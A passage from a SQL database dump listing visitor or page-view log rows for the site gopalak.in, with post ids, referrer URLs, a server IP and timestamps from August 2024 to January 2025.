08:57:16'),(2800,9,0,0,85,1,'','3.110.242.160','','','','2024-08-02 14:37:21'),(2801,9,0,0,135,1,'','3.110.242.160','','','','2024-08-03 05:49:10'),(2802,9,0,0,136,1,'','3.110.242.160','','','','2024-08-03 06:27:56'),(2803,9,0,0,85,1,'','3.110.242.160','','','','2024-08-03 12:26:40'),(2804,0,0,1,1755,1,'','3.110.242.160','','','','2024-08-05 02:42:19'),(2805,9,0,0,85,1,'','3.110.242.160','','','','2024-08-05 12:31:03'),(2806,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-05 14:52:06'),(2807,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-06 05:19:36'),(2808,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-07 13:58:18'),(2809,0,0,1,1775,1,'','3.110.242.160','','','','2024-08-08 01:34:59'),(2810,0,0,1,1755,1,'','3.110.242.160','','','','2024-08-08 06:19:27'),(2811,1,0,0,0,1,'','3.110.242.160','','','','2024-08-08 10:48:19'),(2812,9,0,0,85,1,'','3.110.242.160','','','','2024-08-08 14:53:53'),(2813,9,0,0,136,1,'','3.110.242.160','','','','2024-08-08 20:13:26'),(2814,9,0,0,135,1,'','3.110.242.160','','','','2024-08-08 21:42:25'),(2815,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-09 01:06:04'),(2816,1,0,0,0,1,'','3.110.242.160','','','','2024-08-09 01:25:14'),(2817,0,0,1,1775,1,'','3.110.242.160','','','','2024-08-09 04:03:55'),(2818,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-09 13:54:16'),(2819,0,0,1,1755,1,'','3.110.242.160','','','','2024-08-09 21:05:59'),(2820,0,0,1,1755,1,'','3.110.242.160','','','','2024-08-10 01:18:57'),(2821,9,0,0,135,1,'','3.110.242.160','','','','2024-08-10 10:14:52'),(2822,1,0,0,0,1,'','3.110.242.160','','','','2024-08-10 11:03:14'),(2823,0,0,1,1755,1,'','3.110.242.160','','','','2024-08-10 20:39:36'),(2824,9,0,0,85,1,'','3.110.242.160','','','','2024-08-11 08:52:31'),(2825,1,0,0,0,1,'','3.110.242.160','','','','2024-08-11 11:19:58'),(2826,1,0,0,0,1,'','3.110.242.160','','','','2024-08-11 11:20:10'),(2827,9,0,0,136,1,'','3.110.242.160','','','','2024-08-12 10:57:21'),(2828,0,0,1,1775,1,'','3.110.242.160','','','','2024-08-12 19:36:50'),(2829,9,0,0,85,1,'','3.110.242.160','','','','2024-08-12 21:10:15'),(2830,1,0,0,0,1,'','3.110.242.160','','','','2024-08-13 16:50:12'),(2831,1,0,0,0,1,'','3.110.242.160','','','','2024-08-13 23:35:36'),(2832,9,0,0,135,1,'','3.110.242.160','','','','2024-08-14 00:40:28'),(2833,9,0,0,136,1,'','3.110.242.160','','','','2024-08-14 02:59:00'),(2834,1,0,0,0,1,'','3.110.242.160','','','','2024-08-14 10:57:52'),(2835,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-14 12:29:07'),(2836,1,0,0,0,1,'','3.110.242.160','','','','2024-08-14 19:34:47'),(2837,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-15 01:24:22'),(2838,9,0,0,136,1,'','3.110.242.160','','','','2024-08-15 05:06:14'),(2839,9,0,0,135,1,'','3.110.242.160','','','','2024-08-15 08:56:05'),(2840,1,0,0,0,1,'','3.110.242.160','','','','2024-08-15 09:42:28'),(2841,0,0,1,1755,1,'','3.110.242.160','','','','2024-08-15 13:59:51'),(2842,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-15 19:51:39'),(2843,1,0,0,0,1,'','3.110.242.160','','','','2024-08-16 02:58:26'),(2844,9,0,0,135,1,'','3.110.242.160','','','','2024-08-16 04:35:17'),(2845,0,0,1,1775,1,'','3.110.242.160','','','','2024-08-16 05:52:32'),(2846,9,0,0,136,1,'','3.110.242.160','','','','2024-08-16 06:09:55'),(2847,1,0,0,0,1,'','3.110.242.160','','','','2024-08-16 07:01:22'),(2848,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-16 10:19:50'),(2849,9,0,0,136,1,'','3.110.242.160','','','','2024-08-16 14:59:20'),(2850,0,0,1,1775,1,'','3.110.242.160','','','','2024-08-16 14:59:31'),(2851,9,0,0,135,1,'','3.110.242.160','','','','2024-08-16 17:15:27'),(2852,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-16 20:36:15'),(2853,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-08-17 13:04:25'),(2854,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-18 03:03:36'),(2855,9,0,0,85,1,'','3.110.242.160','','','','2024-08-18 12:24:11'),(2856,0,0,1,1755,1,'','3.110.242.160','','','','2024-08-18 13:19:20'),(2857,1,0,0,0,1,'','3.110.242.160','','','','2024-08-18 19:03:26'),(2858,1,0,0,0,1,'','3.110.242.160','','','','2024-08-19 03:36:41'),(2859,1,0,0,0,1,'','3.110.242.160','','','','2024-08-19 03:36:51'),(2860,1,0,0,0,1,'','3.110.242.160','','','','2024-08-19 15:32:01'),(2861,9,0,0,136,1,'','3.110.242.160','','','','2024-08-19 15:53:36'),(2862,0,0,1,1775,1,'','3.110.242.160','','','','2024-08-20 02:17:38'),(2863,1,0,0,0,1,'','3.110.242.160','','','','2024-08-20 07:23:32'),(2864,9,0,0,135,1,'','3.110.242.160','','','','2024-08-20 10:48:15'),(2865,1,0,0,0,1,'https://www.google.com/','3.110.242.160','','','','2024-08-20 12:24:05'),(2866,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-20 18:14:08'),(2867,0,0,1,1775,1,'','3.110.242.160','','','','2024-08-21 02:47:30'),(2868,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-21 19:25:42'),(2869,0,0,1,1755,1,'','3.110.242.160','','','','2024-08-22 15:06:27'),(2870,1,0,0,0,1,'','3.110.242.160','','','','2024-08-22 15:25:19'),(2871,0,0,1,1775,1,'','3.110.242.160','','','','2024-08-22 19:52:00'),(2872,9,0,0,135,1,'','3.110.242.160','','','','2024-08-23 06:14:06'),(2873,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-23 15:29:21'),(2874,1,0,0,0,1,'','3.110.242.160','','','','2024-08-24 11:31:35'),(2875,9,0,0,85,1,'','3.110.242.160','','','','2024-08-25 08:48:01'),(2876,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-25 09:25:14'),(2877,9,0,0,136,1,'','3.110.242.160','','','','2024-08-26 12:17:09'),(2878,1,0,0,0,1,'','3.110.242.160','','','','2024-08-28 11:55:57'),(2879,0,0,1,1775,1,'','3.110.242.160','','','','2024-08-29 23:05:47'),(2880,1,0,0,0,1,'','3.110.242.160','','','','2024-08-29 23:22:26'),(2881,0,0,1,1755,1,'','3.110.242.160','','','','2024-08-30 00:41:06'),(2882,0,0,1,1786,1,'','3.110.242.160','','','','2024-08-30 02:16:38'),(2883,9,0,0,136,1,'','3.110.242.160','','','','2024-08-30 02:29:09'),(2884,1,0,0,0,1,'','3.110.242.160','','','','2024-09-01 21:20:59'),(2885,9,0,0,135,1,'','3.110.242.160','','','','2024-09-03 03:08:55'),(2886,9,0,0,85,1,'','3.110.242.160','','','','2024-09-03 20:06:45'),(2887,0,0,1,1786,1,'','3.110.242.160','','','','2024-09-04 09:49:44'),(2888,0,0,1,1775,1,'','3.110.242.160','','','','2024-09-04 13:48:01'),(2889,1,0,0,0,1,'','3.110.242.160','','','','2024-09-07 00:14:24'),(2890,9,0,0,136,1,'','3.110.242.160','','','','2024-09-07 08:39:57'),(2891,0,0,1,1755,1,'','3.110.242.160','','','','2024-09-07 19:05:12'),(2892,0,0,1,1786,1,'','3.110.242.160','','','','2024-09-08 03:07:20'),(2893,0,0,1,1775,1,'','3.110.242.160','','','','2024-09-08 15:13:27'),(2894,9,0,0,136,1,'','3.110.242.160','','','','2024-09-09 11:02:29'),(2895,1,0,0,0,1,'','3.110.242.160','','','','2024-09-12 06:19:37'),(2896,0,0,1,1755,1,'','3.110.242.160','','','','2024-09-12 10:07:09'),(2897,0,0,1,1775,1,'','3.110.242.160','','','','2024-09-12 12:09:35'),(2898,1,0,0,0,1,'','3.110.242.160','','','','2024-09-12 12:41:06'),(2899,0,0,1,1786,1,'','3.110.242.160','','','','2024-09-12 12:42:47'),(2900,9,0,0,135,1,'','3.110.242.160','','','','2024-09-12 20:51:56'),(2901,9,0,0,136,1,'','3.110.242.160','','','','2024-09-13 22:16:36'),(2902,0,0,1,1755,1,'','3.110.242.160','','','','2024-09-15 03:33:13'),(2903,9,0,0,136,1,'','3.110.242.160','','','','2024-09-15 11:59:43'),(2904,9,0,0,85,1,'','3.110.242.160','','','','2024-09-15 12:12:14'),(2905,0,0,1,1755,1,'','3.110.242.160','','','','2024-09-19 11:17:29'),(2906,1,0,0,0,1,'','3.110.242.160','','','','2024-09-19 12:04:47'),(2907,0,0,1,1775,1,'','3.110.242.160','','','','2024-09-19 12:22:55'),(2908,1,0,0,0,1,'','3.110.242.160','','','','2024-09-20 12:50:10'),(2909,1,0,0,0,1,'','3.110.242.160','','','','2024-09-21 02:20:33'),(2910,9,0,0,136,1,'','3.110.242.160','','','','2024-09-23 00:46:47'),(2911,9,0,0,135,1,'','3.110.242.160','','','','2024-09-23 12:36:25'),(2912,9,0,0,136,1,'','3.110.242.160','','','','2024-09-23 13:41:41'),(2913,1,0,0,0,1,'https://www.google.com/','3.110.242.160','','','','2024-09-24 06:19:19'),(2914,0,0,1,1755,1,'','3.110.242.160','','','','2024-09-24 10:09:21'),(2915,0,0,1,1775,1,'','3.110.242.160','','','','2024-09-24 11:03:21'),(2916,0,0,1,1786,1,'','3.110.242.160','','','','2024-09-24 11:43:04'),(2917,9,0,0,136,1,'','3.110.242.160','','','','2024-09-24 11:43:05'),(2918,1,0,0,0,1,'','3.110.242.160','','','','2024-09-25 02:16:08'),(2919,9,0,0,85,1,'','3.110.242.160','','','','2024-09-25 02:16:09'),(2920,0,0,1,1786,1,'','3.110.242.160','','','','2024-09-25 02:16:11'),(2921,1,0,0,0,1,'','3.110.242.160','','','','2024-09-25 02:16:17'),(2922,9,0,0,135,1,'','3.110.242.160','','','','2024-09-25 02:16:18'),(2923,9,0,0,135,1,'','3.110.242.160','','','','2024-09-25 02:16:21'),(2924,0,0,1,1775,1,'','3.110.242.160','','','','2024-09-25 02:16:23'),(2925,1,0,0,0,1,'','3.110.242.160','','','','2024-09-25 02:16:27'),(2926,9,0,0,136,1,'','3.110.242.160','','','','2024-09-25 02:16:29'),(2927,9,0,0,136,1,'','3.110.242.160','','','','2024-09-25 02:16:31'),(2928,9,0,0,136,1,'','3.110.242.160','','','','2024-09-25 02:16:32'),(2929,0,0,1,1755,1,'','3.110.242.160','','','','2024-09-25 02:16:34'),(2930,0,0,1,1755,1,'','3.110.242.160','','','','2024-09-25 02:16:37'),(2931,0,0,1,1786,1,'','3.110.242.160','','','','2024-09-25 13:31:53'),(2932,0,0,1,1786,1,'','3.110.242.160','','','','2024-09-25 17:35:44'),(2933,9,0,0,136,1,'','3.110.242.160','','','','2024-09-26 03:07:54'),(2934,9,0,0,85,1,'','3.110.242.160','','','','2024-09-26 09:10:16'),(2935,0,0,1,1775,1,'','3.110.242.160','','','','2024-09-28 10:39:05'),(2936,0,0,1,1775,1,'','3.110.242.160','','','','2024-09-28 11:40:13'),(2937,0,0,1,1786,1,'','3.110.242.160','','','','2024-09-30 00:20:08'),(2938,0,0,1,1786,1,'','3.110.242.160','','','','2024-09-30 06:41:44'),(2939,9,0,0,85,1,'','3.110.242.160','','','','2024-09-30 10:10:26'),(2940,0,0,1,1786,1,'','3.110.242.160','','','','2024-10-01 02:41:07'),(2941,1,0,0,0,1,'','3.110.242.160','','','','2024-10-01 06:57:07'),(2942,9,0,0,136,1,'','3.110.242.160','','','','2024-10-02 22:15:26'),(2943,1,0,0,0,1,'','3.110.242.160','','','','2024-10-02 22:27:23'),(2944,9,0,0,136,1,'','3.110.242.160','','','','2024-10-04 17:29:00'),(2945,1,0,0,0,1,'','3.110.242.160','','','','2024-10-07 20:53:26'),(2946,9,0,0,136,1,'','3.110.242.160','','','','2024-10-07 23:36:16'),(2947,9,0,0,135,1,'','3.110.242.160','','','','2024-10-08 04:05:03'),(2948,0,0,1,1786,1,'','3.110.242.160','','','','2024-10-08 09:10:32'),(2949,1,0,0,0,1,'','3.110.242.160','','','','2024-10-08 11:58:27'),(2950,0,0,1,1755,1,'','3.110.242.160','','','','2024-10-08 12:53:48'),(2951,0,0,1,1755,1,'','3.110.242.160','','','','2024-10-09 02:09:26'),(2952,1,0,0,0,1,'','3.110.242.160','','','','2024-10-09 03:07:39'),(2953,0,0,1,1775,1,'','3.110.242.160','','','','2024-10-09 04:47:01'),(2954,0,0,1,1786,1,'','3.110.242.160','','','','2024-10-09 07:46:12'),(2955,1,0,0,0,1,'https://gopalak.in/shop','3.110.242.160','','','','2024-10-09 20:22:40'),(2956,9,0,0,136,1,'','3.110.242.160','','','','2024-10-09 20:48:56'),(2957,0,0,1,1755,1,'','3.110.242.160','','','','2024-10-14 09:18:55'),(2958,0,0,1,1786,1,'','3.110.242.160','','','','2024-10-15 09:37:47'),(2959,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-10-16 09:55:42'),(2960,9,0,0,136,1,'','3.110.242.160','','','','2024-10-16 12:04:13'),(2961,1,0,0,0,1,'','3.110.242.160','','','','2024-10-16 22:15:58'),(2962,9,0,0,136,1,'','3.110.242.160','','','','2024-10-17 00:05:33'),(2963,9,0,0,85,1,'','3.110.242.160','','','','2024-10-18 05:45:43'),(2964,0,0,1,1755,1,'','3.110.242.160','','','','2024-10-18 09:40:34'),(2965,9,0,0,135,1,'','3.110.242.160','','','','2024-10-19 19:40:07'),(2966,0,0,1,1786,1,'','3.110.242.160','','','','2024-10-20 10:54:42'),(2967,1,0,0,0,1,'http://www.google.com.hk','3.110.242.160','','','','2024-10-21 15:48:31'),(2968,0,0,1,1755,1,'','3.110.242.160','','','','2024-10-23 10:20:33'),(2969,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2024-10-23 12:47:57'),(2970,0,0,1,1786,1,'','3.110.242.160','','','','2024-10-24 09:35:04'),(2971,0,0,1,1755,1,'','3.110.242.160','','','','2024-10-26 11:58:53'),(2972,1,0,0,0,1,'https://gopalak.in/donate/','3.110.242.160','','','','2024-10-28 05:09:39'),(2973,0,0,1,1775,1,'','3.110.242.160','','','','2024-10-29 04:51:03'),(2974,0,0,1,1786,1,'','3.110.242.160','','','','2024-10-29 17:18:19'),(2975,9,0,0,136,1,'','3.110.242.160','','','','2024-10-30 00:16:32'),(2976,1,0,0,0,1,'','3.110.242.160','','','','2024-10-30 02:54:26'),(2977,1,0,0,0,1,'','3.110.242.160','','','','2024-10-30 09:48:25'),(2978,0,0,1,1755,1,'','3.110.242.160','','','','2024-10-30 11:11:20'),(2979,1,0,0,0,1,'','3.110.242.160','','','','2024-10-30 15:56:18'),(2980,9,0,0,135,1,'','3.110.242.160','','','','2024-10-31 04:54:45'),(2981,9,0,0,136,1,'','3.110.242.160','','','','2024-10-31 12:09:50'),(2982,9,0,0,135,1,'','3.110.242.160','','','','2024-10-31 12:09:51'),(2983,9,0,0,85,1,'','3.110.242.160','','','','2024-10-31 12:09:55'),(2984,0,0,1,1786,1,'','3.110.242.160','','','','2024-10-31 12:09:56'),(2985,0,0,1,1755,1,'','3.110.242.160','','','','2024-10-31 12:10:00'),(2986,0,0,1,1775,1,'','3.110.242.160','','','','2024-10-31 12:10:04'),(2987,1,0,0,0,1,'','3.110.242.160','','','','2024-10-31 12:10:26'),(2988,1,0,0,0,1,'','3.110.242.160','','','','2024-10-31 12:10:32'),(2989,1,0,0,0,1,'','3.110.242.160','','','','2024-10-31 12:10:33'),(2990,1,0,0,0,1,'','3.110.242.160','','','','2024-10-31 12:10:36'),(2991,1,0,0,0,1,'','3.110.242.160','','','','2024-10-31 19:43:18'),(2992,1,0,0,0,1,'','3.110.242.160','','','','2024-11-02 00:25:02'),(2993,0,0,1,1786,1,'','3.110.242.160','','','','2024-11-02 16:03:42'),(2994,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-03 09:34:13'),(2995,1,0,0,0,1,'http://www.google.com.hk','3.110.242.160','','','','2024-11-03 16:11:26'),(2996,9,0,0,136,1,'','3.110.242.160','','','','2024-11-03 18:35:13'),(2997,9,0,0,136,1,'','3.110.242.160','','','','2024-11-03 18:35:14'),(2998,9,0,0,135,1,'','3.110.242.160','','','','2024-11-03 18:35:17'),(2999,9,0,0,135,1,'','3.110.242.160','','','','2024-11-03 18:35:19'),(3000,9,0,0,136,1,'','3.110.242.160','','','','2024-11-03 18:35:21'),(3001,0,0,1,1775,1,'','3.110.242.160','','','','2024-11-03 18:35:24'),(3002,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-03 18:35:26'),(3003,0,0,1,1786,1,'','3.110.242.160','','','','2024-11-03 18:35:28'),(3004,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-03 18:35:56'),(3005,0,0,1,1775,1,'','3.110.242.160','','','','2024-11-03 18:36:10'),(3006,9,0,0,85,1,'','3.110.242.160','','','','2024-11-03 18:36:10'),(3007,1,0,0,0,1,'','3.110.242.160','','','','2024-11-03 18:38:12'),(3008,1,0,0,0,1,'','3.110.242.160','','','','2024-11-03 18:38:13'),(3009,1,0,0,0,1,'','3.110.242.160','','','','2024-11-03 18:38:18'),(3010,1,0,0,0,1,'','3.110.242.160','','','','2024-11-04 05:08:08'),(3011,1,0,0,0,1,'https://www.google.com/','3.110.242.160','','','','2024-11-04 13:04:21'),(3012,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-11-06 01:34:17'),(3013,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-06 12:28:57'),(3014,9,0,0,85,1,'','3.110.242.160','','','','2024-11-06 17:08:19'),(3015,9,0,0,136,1,'','3.110.242.160','','','','2024-11-06 17:12:01'),(3016,9,0,0,135,1,'','3.110.242.160','','','','2024-11-06 17:12:24'),(3017,1,0,0,0,1,'','3.110.242.160','','','','2024-11-06 22:34:25'),(3018,1,0,0,0,1,'','3.110.242.160','','','','2024-11-07 02:23:44'),(3019,9,0,0,136,1,'','3.110.242.160','','','','2024-11-07 16:59:32'),(3020,0,0,1,1786,1,'','3.110.242.160','','','','2024-11-07 21:16:48'),(3021,1,0,0,0,1,'','3.110.242.160','','','','2024-11-07 23:34:47'),(3022,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-11-08 05:34:58'),(3023,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-11-08 14:37:48'),(3024,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-09 08:10:35'),(3025,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-11-09 16:31:10'),(3026,1,0,0,0,1,'','3.110.242.160','','','','2024-11-10 02:13:20'),(3027,9,0,0,136,1,'','3.110.242.160','','','','2024-11-10 03:07:32'),(3028,9,0,0,85,1,'','3.110.242.160','','','','2024-11-10 03:10:01'),(3029,9,0,0,135,1,'','3.110.242.160','','','','2024-11-10 03:10:17'),(3030,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-11-10 09:49:59'),(3031,9,0,0,135,1,'','3.110.242.160','','','','2024-11-11 02:51:31'),(3032,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-11 05:44:26'),(3033,0,0,1,1775,1,'','3.110.242.160','','','','2024-11-11 05:46:01'),(3034,0,0,1,1786,1,'','3.110.242.160','','','','2024-11-11 05:46:06'),(3035,1,0,0,0,1,'https://www.google.com/','3.110.242.160','','','','2024-11-11 20:01:10'),(3036,1,0,0,0,1,'http://www.google.com.hk','3.110.242.160','','','','2024-11-11 20:17:21'),(3037,1,0,0,0,1,'https://www.google.com/','3.110.242.160','','','','2024-11-12 07:30:45'),(3038,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-12 08:11:08'),(3039,0,0,1,1775,1,'','3.110.242.160','','','','2024-11-12 10:34:44'),(3040,9,0,0,136,1,'','3.110.242.160','','','','2024-11-12 17:03:22'),(3041,1,0,0,0,1,'','3.110.242.160','','','','2024-11-12 17:10:45'),(3042,9,0,0,85,1,'','3.110.242.160','','','','2024-11-13 12:46:57'),(3043,1,0,0,0,1,'','3.110.242.160','','','','2024-11-13 15:10:31'),(3044,9,0,0,136,1,'','3.110.242.160','','','','2024-11-13 15:35:08'),(3045,9,0,0,135,1,'','3.110.242.160','','','','2024-11-13 15:37:26'),(3046,0,0,1,1775,1,'','3.110.242.160','','','','2024-11-14 16:47:56'),(3047,0,0,1,1786,1,'','3.110.242.160','','','','2024-11-16 04:56:15'),(3048,1,0,0,0,1,'','3.110.242.160','','','','2024-11-17 06:06:38'),(3049,1,0,0,0,1,'','3.110.242.160','','','','2024-11-18 02:50:15'),(3050,9,0,0,136,1,'','3.110.242.160','','','','2024-11-18 02:50:21'),(3051,9,0,0,135,1,'','3.110.242.160','','','','2024-11-18 02:50:31'),(3052,0,0,1,1786,1,'','3.110.242.160','','','','2024-11-18 02:51:09'),(3053,0,0,1,1775,1,'','3.110.242.160','','','','2024-11-18 02:51:18'),(3054,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-18 02:51:24'),(3055,9,0,0,85,1,'','3.110.242.160','','','','2024-11-18 02:51:44'),(3056,0,0,1,1786,1,'','3.110.242.160','','','','2024-11-19 22:55:21'),(3057,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2024-11-19 23:14:02'),(3058,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2024-11-20 06:22:44'),(3059,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-20 18:01:15'),(3060,9,0,0,136,1,'','3.110.242.160','','','','2024-11-21 12:25:54'),(3061,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-21 15:35:04'),(3062,0,0,1,1775,1,'','3.110.242.160','','','','2024-11-21 15:36:19'),(3063,0,0,1,1786,1,'','3.110.242.160','','','','2024-11-21 15:42:24'),(3064,9,0,0,136,1,'','3.110.242.160','','','','2024-11-21 16:05:05'),(3065,9,0,0,85,1,'','3.110.242.160','','','','2024-11-21 16:05:50'),(3066,9,0,0,135,1,'','3.110.242.160','','','','2024-11-21 16:09:12'),(3067,1,0,0,0,1,'','3.110.242.160','','','','2024-11-21 16:39:24'),(3068,1,0,0,0,1,'','3.110.242.160','','','','2024-11-23 09:04:11'),(3069,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-11-24 09:22:41'),(3070,0,0,1,1755,1,'','3.110.242.160','','','','2024-11-24 09:25:39'),(3071,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-11-25 06:16:17'),(3072,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-11-25 16:01:06'),(3073,1,0,0,0,1,'https://gopalak.in/?author=6','3.110.242.160','','','','2024-11-26 11:39:22'),(3074,0,0,1,1775,1,'','3.110.242.160','','','','2024-11-29 16:43:39'),(3075,9,0,0,135,1,'','3.110.242.160','','','','2024-11-29 22:47:06'),(3076,9,0,0,136,1,'','3.110.242.160','','','','2024-11-30 02:48:53'),(3077,1,0,0,0,1,'','3.110.242.160','','','','2024-11-30 20:12:16'),(3078,9,0,0,85,1,'','3.110.242.160','','','','2024-12-01 19:01:08'),(3079,9,0,0,136,1,'','3.110.242.160','','','','2024-12-01 21:35:07'),(3080,0,0,1,1755,1,'','3.110.242.160','','','','2024-12-01 23:02:54'),(3081,1,0,0,0,1,'','3.110.242.160','','','','2024-12-02 18:31:53'),(3082,0,0,1,1775,1,'','3.110.242.160','','','','2024-12-03 02:09:18'),(3083,9,0,0,135,1,'','3.110.242.160','','','','2024-12-03 05:43:11'),(3084,9,0,0,85,1,'','3.110.242.160','','','','2024-12-03 20:26:25'),(3085,9,0,0,136,1,'','3.110.242.160','','','','2024-12-04 00:32:23'),(3086,9,0,0,136,1,'https://dancewearcorqsner.shop/product/make-your-dreams-come-true-to-wear-craft-pointe-shoes-fashion/','3.110.242.160','','','','2024-12-04 08:13:06'),(3087,0,0,1,1775,1,'https://gopalak.in/product/abc/','3.110.242.160','','','','2024-12-04 08:13:09'),(3088,0,0,1,1775,1,'','3.110.242.160','','','','2024-12-06 09:44:19'),(3089,1,0,0,0,1,'','3.110.242.160','','','','2024-12-06 17:50:55'),(3090,0,0,1,1775,1,'','3.110.242.160','','','','2024-12-06 22:45:08'),(3091,1,0,0,0,1,'','3.110.242.160','','','','2024-12-06 23:37:38'),(3092,0,0,1,1786,1,'','3.110.242.160','','','','2024-12-07 15:47:47'),(3093,9,0,0,136,1,'','3.110.242.160','','','','2024-12-07 15:48:57'),(3094,1,0,0,0,1,'','3.110.242.160','','','','2024-12-08 02:47:52'),(3095,0,0,1,1775,1,'','3.110.242.160','','','','2024-12-08 06:33:07'),(3096,1,0,0,0,1,'','3.110.242.160','','','','2024-12-08 06:49:02'),(3097,0,1,0,0,21,'','3.110.242.160','','','','2024-12-08 10:12:09'),(3098,1,0,0,0,1,'','3.110.242.160','','','','2024-12-08 14:54:10'),(3099,0,1,0,0,21,'','3.110.242.160','','','','2024-12-08 22:57:27'),(3100,1,0,0,0,1,'','3.110.242.160','','','','2024-12-09 06:57:31'),(3101,0,0,1,1755,1,'','3.110.242.160','','','','2024-12-09 17:56:36'),(3102,1,0,0,0,1,'','3.110.242.160','','','','2024-12-10 05:54:38'),(3103,0,0,1,1775,1,'','3.110.242.160','','','','2024-12-10 22:42:11'),(3104,1,0,0,0,1,'','3.110.242.160','','','','2024-12-11 05:26:53'),(3105,0,0,1,1786,1,'','3.110.242.160','','','','2024-12-11 06:12:40'),(3106,1,0,0,0,1,'','3.110.242.160','','','','2024-12-11 10:46:19'),(3107,0,0,1,1755,1,'','3.110.242.160','','','','2024-12-11 15:54:11'),(3108,0,0,1,1786,1,'','3.110.242.160','','','','2024-12-11 21:39:45'),(3109,9,0,0,135,1,'','3.110.242.160','','','','2024-12-11 23:07:23'),(3110,1,0,0,0,1,'','3.110.242.160','','','','2024-12-12 10:39:18'),(3111,1,0,0,0,1,'','3.110.242.160','','','','2024-12-12 16:10:09'),(3112,1,0,0,0,1,'https://gopalak.in/','3.110.242.160','','','','2024-12-13 06:54:28'),(3113,1,0,0,0,1,'','3.110.242.160','','','','2024-12-13 11:19:47'),(3114,1,0,0,0,1,'','3.110.242.160','','','','2024-12-13 20:05:00'),(3115,0,0,1,1775,1,'','3.110.242.160','','','','2024-12-14 11:44:53'),(3116,0,1,0,0,21,'','3.110.242.160','','','','2024-12-14 20:34:44'),(3117,1,0,0,0,1,'','3.110.242.160','','','','2024-12-15 02:32:01'),(3118,9,0,0,85,1,'https://gopalak.in/home/','3.110.242.160','','','','2024-12-15 13:16:35'),(3119,0,0,1,1755,1,'','3.110.242.160','','','','2024-12-16 14:53:38'),(3120,9,0,0,136,1,'','3.110.242.160','','','','2024-12-18 12:02:52'),(3121,0,0,1,1755,1,'https://www.google.com/','3.110.242.160','','','','2024-12-18 12:53:40'),(3122,1,0,0,0,1,'https://www.google.com/','3.110.242.160','','','','2024-12-19 14:10:41'),(3123,0,0,1,1755,1,'','3.110.242.160','','','','2024-12-21 07:12:01'),(3124,0,0,1,1786,1,'','3.110.242.160','','','','2024-12-21 15:33:34'),(3125,1,0,0,0,1,'http://gopalak.in','3.110.242.160','','','','2024-12-22 06:51:53'),(3126,0,0,1,1755,1,'','3.110.242.160','','','','2024-12-22 18:28:38'),(3127,0,0,1,1786,1,'','3.110.242.160','','','','2024-12-23 00:57:24'),(3128,1,0,0,0,1,'','3.110.242.160','','','','2024-12-23 03:11:53'),(3129,0,0,1,1786,1,'','3.110.242.160','','','','2024-12-23 13:49:53'),(3130,9,0,0,135,1,'','3.110.242.160','','','','2024-12-23 17:48:32'),(3131,0,0,1,1755,1,'','3.110.242.160','','','','2024-12-24 13:28:03'),(3132,0,0,1,1786,1,'','3.110.242.160','','','','2024-12-24 14:10:42'),(3133,0,0,1,1775,1,'','3.110.242.160','','','','2024-12-25 22:12:18'),(3134,1,0,0,0,1,'https://gopalak.in/shop','3.110.242.160','','','','2024-12-26 10:27:03'),(3135,0,0,1,1786,1,'https://gopalak.in/product/cattle','3.110.242.160','','','','2024-12-26 23:09:36'),(3136,9,0,0,85,1,'https://gopalak.in/product-tag/pre-order','3.110.242.160','','','','2024-12-26 23:16:48'),(3137,9,0,0,136,1,'https://gopalak.in/product-category/donation','3.110.242.160','','','','2024-12-26 23:19:53'),(3138,0,0,1,1755,1,'https://gopalak.in/product/cow','3.110.242.160','','','','2024-12-26 23:24:14'),(3139,0,0,1,1775,1,'https://gopalak.in/product/abc','3.110.242.160','','','','2024-12-26 23:41:42'),(3140,9,0,0,135,1,'https://gopalak.in/product-category/organic-fertilizer-repellent','3.110.242.160','','','','2024-12-27 00:07:07'),(3141,0,0,1,1775,1,'','3.110.242.160','','','','2024-12-27 06:16:00'),(3142,9,0,0,135,1,'','3.110.242.160','','','','2024-12-27 06:18:03'),(3143,0,0,1,1755,1,'https://gopalak.in/?p=1755','3.110.242.160','','','','2024-12-27 15:53:36'),(3144,0,0,1,1786,1,'','3.110.242.160','','','','2024-12-28 11:04:07'),(3145,0,0,1,1786,1,'','3.110.242.160','','','','2024-12-29 10:13:51'),(3146,1,0,0,0,1,'','3.110.242.160','','','','2024-12-30 15:03:53'),(3147,0,0,1,1775,1,'','3.110.242.160','','','','2024-12-30 20:34:19'),(3148,9,0,0,136,1,'','3.110.242.160','','','','2024-12-31 19:42:18'),(3149,1,0,0,0,1,'','3.110.242.160','','','','2025-01-01 